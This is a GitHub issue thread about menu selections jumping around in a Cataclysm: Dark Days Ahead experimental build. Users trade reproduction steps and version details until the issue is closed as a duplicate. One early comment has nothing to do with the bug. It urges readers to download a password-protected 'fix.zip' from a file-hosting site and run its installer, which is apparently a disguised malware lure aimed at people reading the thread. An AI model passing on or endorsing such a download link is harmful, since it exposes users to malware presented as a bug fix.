### ISSUE TITLE
Unreachable menu points due to jumping around

### ISSUE THREAD

**Issue by RobertBoettcherSF** [CleverRaven/Cataclysm-DDA#75962] opened 2024-08-26 05:20 UTC
### Describe the bug

There is no reliable way to reach menu points in the latest experimental bui.ds
[Peaceful Tropical World-trimmed.tar.gz](https://github.com/user-attachments/files/16744272/Peaceful.Tropical.World-trimmed.tar.gz)
 Today I play 2024-08-26-0108 Version: 8185064 with a save I created yesterday.

### Attach save file

[Peaceful Tropical World-trimmed.tar.gz](https://github.com/user-attachments/files/16744340/Peaceful.Tropical.World-trimmed.tar.gz)

### Steps to reproduce

1. Open any menu
2. Press keyboard up twice or thrice
- The writing will be in two places, the current selection unknown. Hotkeys work fine.

4. Bonus fun if you wiggle your mouse over the menu

But the most kaput is in the map editor.
Go to Debug Mode, Map Editor. And then try edit a field. Like you want to replace thin air with something, to enter a house.
This menu jumps so much, even without any user input. (Screenshot 2) Can only hit enter and r when something is selected that might work.

Then when jumping back into game, the menu is all black, until it refreshes after a tick I think.
![2024-08-26 (6)](https://github.com/user-attachments/assets/e1e1095d-7c08-4a9b-9315-7bb541c671af)

### Expected behavior

I am used to be able to scroll with keyboard (or mouse, no problem) to the desired menu points. Now, in some menus, the currently selected point in the menu jumps around for no reason. I can access the function, by knowing the hotkey.
But replacing a tile in map editor is a gamble, I just hit enter or r when I want to log in something other than thin air.

### Screenshots

![2024-08-26 (4)](https://github.com/user-attachments/assets/0ca4f986-6d8a-4104-8a8d-17a7ce90de47)

### Versions and configuration

2024-08-26-0108 Version: 8185064

**Comment by WSA1k** [comment] 2024-08-26 05:21
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobertBoettcherSF** [comment] 2024-08-26 05:22
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Thats not related to the issue.

**Comment by NetSysFire** [comment] 2024-08-26 05:50
Can not reproduce on the very latest build here with the main menu. However, the debug spawn item menu is basically unusable due to I think this.

**Comment by NetSysFire** [comment] 2024-08-26 05:50
Also, you did not attach any proper version info. There is a reason the info is mandatory.

**Comment by RobertBoettcherSF** [comment] 2024-08-26 06:07
> Also, you did not attach any proper version info. There is a reason the info is mandatory.

Define proper version info. Where on Catapult or in the program can I see that?
I followed the advice from this post:
https://discourse.cataclysmdda.org/t/how-to-get-your-bug-reports-seen-and-fixed/635

And filled the form here on Github.

**Comment by NetSysFire** [comment] 2024-08-26 06:08
You follow the advice in the issue template. Which says to open the debug menu, go to info and generate game report.
The post is 11 years old.

**Comment by RobertBoettcherSF** [comment] 2024-08-26 06:08
> Can not reproduce on the very latest build here with the main menu. However, the debug spawn item menu is basically unusable due to I think this.

What about the debug menu?
Go to map editor. e for edit terrain. It jumps around for no reason, impossible to select anything.

**Comment by RobertBoettcherSF** [comment] 2024-08-26 06:10
> You follow the advice in the issue template. Which says to open the debug menu, go to info and generate game report. The post is 11 years old.

Before generating game report was not mentioned. 11 year old posts can still be valid.

**Comment by RobertBoettcherSF** [comment] 2024-08-26 06:11
- OS: Windows
    - OS Version: 10.0.19045.4780 (22H2)
- Game Version: 8185064 [64-bit]
- Graphics Version: Tiles
- Game Language: English [en]
- Mods loaded: [
    Dark Days Ahead [dda],
    Disable NPC Needs [no_npc_food],
    Portal Storms Ignore NPCs [personal_portal_storms],
    Slowdown Fungal Growth [no_fungal_growth],
    No Hope [no_hope],
    SpeedyDex [speedydex],
    Stats Through Kills [stats_through_kills],
    Stats Through Skills [StatsThroughSkills],
    Tamable Wildlife [Tamable_Wildlife],
    No Monsters [Only_Wildlife]
]

**Comment by failboat78** [comment] 2024-08-26 07:43
Same mouse bug https://github.com/CleverRaven/Cataclysm-DDA/issues/75936

**Comment by NetSysFire** [comment] 2024-08-26 09:30
>What about the debug menu?
>Go to map editor. e for edit terrain. It jumps around for no reason, impossible to select anything.

Can not reproduce either. I am on Linux, release https://github.com/CleverRaven/Cataclysm-DDA/releases/tag/cdda-experimental-2024-08-26-0429. The mouse selection in the map editor does not work at all (anymore?), I do not know if that is a recent regression but it might be.
I also tried the thing in the main menu with the mouse, but that also does not reproduce.

The only thing I can reproduce is if you use both mouse and keyboard to select an entry. If the cursor is in the menu, keyboard input simply fails to select everything but the entry directly below and above. If you put the cursor outside of the focused UI part, in this case the menu, it will work. That is what I experienced with the debug menu. The cursor gets hidden pretty fast, so this is indeed hard to notice.

![image](https://github.com/user-attachments/assets/99942666-131c-451a-9f74-f06c54064cdb)

Is this what you mean? This what I get when the cursor is inside that main menu.

**Comment by db48x** [comment] 2024-08-26 16:07
Thank you for filing a bug report, but I think this one might be a duplicate of #75744 and #75936. If there’s anything to report that isn’t already mentioned in those two bugs, could you edit this bug report to contain only that information? Thank you :)

**Comment by NetSysFire** [comment] 2024-08-26 16:11
Closing as duplicate of #75936 then.

**Closed by NetSysFire** 2024-08-26 16:11 UTC
Labels: (S1 - Need confirmation), ImGui
